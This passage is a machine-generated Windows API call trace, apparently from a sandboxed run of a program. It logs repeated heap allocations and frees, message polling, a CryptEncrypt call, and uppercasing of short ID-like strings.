lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.466] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0267.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa8f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0267.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.468] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0267.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0267.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0267.469] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b18e8*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b18e8*, pdwDataLen=0x8bef68*=0x8) returned 1 [0267.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0267.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0267.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.471] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.471] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.472] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.472] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e50 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0267.472] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.472] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e50 [0267.473] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.473] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.473] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.473] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.473] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.473] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0267.473] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.473] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.473] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.474] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.474] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.474] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.474] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.474] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.474] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.474] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.475] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.475] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.475] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.475] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.475] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.475] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0267.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.476] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.476] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.476] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0267.476] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.477] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0267.477] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0267.477] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0267.477] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0267.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.478] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0267.478] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.478] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0267.478] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.478] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.478] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.478] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.479] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.479] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 